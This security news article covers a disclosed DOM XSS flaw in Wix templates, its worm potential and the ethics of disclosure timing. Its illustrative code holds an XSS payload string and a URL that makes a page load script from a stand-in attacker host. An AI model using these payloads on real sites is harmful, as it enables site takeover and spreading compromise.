A cross-site scripting vulnerability on a single website can divert unsuspecting users to malicious sites. When that same vulnerability exists across millions of websites, a worm can hop from site to site and compromise even more users.
Now, a worm exploiting the XSS flaw in website-building platform Wix.com could spread on the scale of the infamous MySpace worm, researchers from Contrast Security warned.
“If the MySpace worm is any guide, taking over all the millions of websites hosted at Wix wouldn’t take very long,” Contrast Security researcher Matt Austin said in his disclosure.
Traditional cross-site scripting attacks deliver a malicious payload in the page the server returns in response to an HTTP/HTTPS request. DOM-based XSS, by contrast, doesn’t rely on the server’s response at all: the payload manipulates the Document Object Model environment that the page’s client-side scripts run in, changing how that code executes in the victim’s browser.
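The distinction can be seen in a few lines of hypothetical client-side code. This is an illustrative sketch of the general DOM XSS pattern, not Wix’s actual code; the variable and function names are stand-ins for real browser APIs:

```typescript
// Minimal sketch of a DOM-based XSS sink. The server's response is clean;
// the page's own script reads attacker-controlled input from the URL and
// writes it into the DOM without escaping. (Illustrative, not Wix's code.)

// Stand-in for `document.location.hash` in a real browser.
const locationHash = "#<img src=x onerror=alert(1)>";

// Stand-in for the `element.innerHTML = ...` sink.
function setInnerHtml(html: string): string {
  return `<div id="banner">${html}</div>`; // no escaping: the vulnerability
}

// Fragment -> DOM with no sanitization. The URL fragment is never even sent
// to the server, so server-side filters and logs never see the payload.
const rendered = setInnerHtml(decodeURIComponent(locationHash.slice(1)));
console.log(rendered);
```

In a reflected attack, the same payload would have to travel to the server and come back in the HTTP response, where server-side filtering at least has a chance to catch it; here it never leaves the browser.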
The severe DOM XSS vulnerability would give an attacker “complete control” over any Wix-hosted website, Austin said. Because the XSS flaw is in Wix templates, it doesn’t matter whether the site lives on a Wix.com subdomain or on a custom domain.
The flaw lets attackers perform a broad range of actions, including unleashing a worm capable of infecting every site on the platform. The attacker would first set up a Wix website embedding the DOM XSS payload in an iframe, then spread the URL around to lure other Wix site owners to the malicious site. The worm would then exploit the XSS flaw in editor.wix.com to edit the visiting site owner’s pages, injecting the DOM XSS in another iframe. Any logged-in Wix user visiting that compromised site would in turn be infected, with the iframe added to their own pages.
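The compounding spread described above is what makes the scenario dangerous. A toy simulation, in which every number and the visiting behavior are assumptions for illustration rather than measurements of the real platform, shows how quickly one seeded site can reach everyone:

```typescript
// Toy model of worm spread on a shared hosting platform. Each round, every
// still-clean site owner visits a few random sites while logged in; landing
// on an infected site injects the payload into the visitor's own site.
// Purely illustrative: parameters and behavior are assumptions.

function simulateSpread(totalSites: number, visitsPerRound: number): number {
  const infected = new Array<boolean>(totalSites).fill(false);
  infected[0] = true; // the attacker's seed site
  let infectedCount = 1;
  let rounds = 0;
  while (infectedCount < totalSites) {
    rounds++;
    for (let owner = 0; owner < totalSites; owner++) {
      if (infected[owner]) continue;
      for (let v = 0; v < visitsPerRound; v++) {
        if (infected[Math.floor(Math.random() * totalSites)]) {
          infected[owner] = true;
          infectedCount++;
          break;
        }
      }
    }
  }
  return rounds;
}

// Exponential growth takes over after the first few infections, so full
// coverage arrives in rounds, not in anything proportional to the site count.
console.log(`rounds to full infection: ${simulateSpread(10_000, 3)}`);
```

The point of the model is the shape of the curve: once a handful of sites carry the payload, each round of ordinary browsing roughly multiplies the infected population, which is why “taking over all the millions of websites hosted at Wix wouldn’t take very long.”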
In this case, the vulnerability was in a function for reading URL parameters. Parameters were stored in a configuration object, and if the user provided a ReactSource token in the URL, it overrode the default location from which the page loaded its script.
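The pattern Austin describes, URL parameters merged over a trusted default, can be sketched as follows. The default URL and the parsing details are assumptions for illustration; this is not Wix’s actual code:

```typescript
// Sketch of the vulnerable pattern: query parameters are merged into a
// configuration object, so an attacker-supplied ReactSource silently
// overrides the trusted default. The default URL is a made-up placeholder.

const defaultConfig: Record<string, string> = {
  ReactSource: "https://trusted.example/react", // assumed trusted default
};

function configFromUrl(url: string): Record<string, string> {
  const config = { ...defaultConfig };
  const query = url.split("?")[1] ?? "";
  for (const pair of query.split("&")) {
    const eq = pair.indexOf("=");
    if (eq > 0) {
      // Any parameter, including ReactSource, clobbers the default.
      config[pair.slice(0, eq)] = decodeURIComponent(pair.slice(eq + 1));
    }
  }
  return config;
}

// An attacker only needs a victim to open a link like this one; the page
// would then load and run script from the attacker's server.
const cfg = configFromUrl("https://victim.example/?ReactSource=https://evil.example");
console.log(cfg.ReactSource); // the attacker's origin, not the default
```

A safer design would whitelist exactly which keys a URL may override, or simply never read a script origin from the URL at all.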
“Administrator control of a Wix.com site could be used to widely distribute malware, create a dynamic, distributed, browser-based botnet, mine cryptocurrency, and otherwise generally control the content of the site as well as the users who use it,” Austin wrote.
Austin claimed he repeatedly tried to contact Wix to get the vulnerability fixed, but despite creating a support ticket and directly emailing [email protected], he never received a response. When he emailed secur[email protected] with details of the flaw, he received an automated reply stating that [email protected] “may not exist, or you may not have permission to post messages to the group.” Austin decided to publicly disclose the flaw because it could be exploited by a worm.
The debate between private and public disclosure is never-ending, and it usually boils down to the organization’s responsiveness. Wix appears to have quietly closed the vulnerability after Austin’s public disclosure, since the proof of concept no longer works. That suggests Wix could have fixed the issue just as swiftly in response to the private reports and avoided a public disclosure in the first place.
While it would be nice if every company had a bug bounty program or a recognized process for reporting and fixing bugs, at the very least every organization should have a way to receive security reports. That could be as straightforward as a dedicated security@ email address.
Simply having the address isn’t enough, though: someone has to check it regularly and triage the reports. Responding to the researcher with what has been done, such as “assigned to a developer to investigate,” and offering periodic updates keeps the researcher informed. Another step is a dedicated path within customer support so that security tickets can be assigned and escalated appropriately instead of languishing in the general queue.
The other tricky detail about disclosure is figuring out how long is long enough to wait. Austin waited 18 days for Wix to respond before he went public. Researchers Charlie Miller and Chris Valasek worked with Chrysler for months before publicizing the software vulnerability in the automaker’s Uconnect dashboard computers. While waiting 30 or even 60 days is fairly common, there have been times when researchers released the information sooner. This past month, Google publicized a local privilege escalation flaw in Windows just 10 days after notifying Microsoft, because the flaw was already being exploited in the wild.
Microsoft didn’t think the vulnerability merited an emergency patch because the attackers were part of a “low-volume spear-phishing campaign” against a limited number of users. The majority of Windows users were not at risk. Should Google have waited for Microsoft? Should Microsoft have given the flaw higher priority?
“I think it’s not a question of days, but rather of efficient cooperation to fix the vulnerability,” said Ilia Kolochenko, CEO of web security firm High-Tech Bridge. “Instead of endless discussions about the ethics of full disclosure, we should rather concentrate on inter-corporate coordination, cooperation, and support to make the internet safer.”
Disclosure is a two-way street. Researchers provide detailed reports, but organizations have to meet them halfway by making those reports easy to submit and keeping researchers updated on their status. Better communication might not stop another Google-Microsoft disagreement on how to prioritize bugs, but it could stop a company from being called out for not fixing a wormable flaw.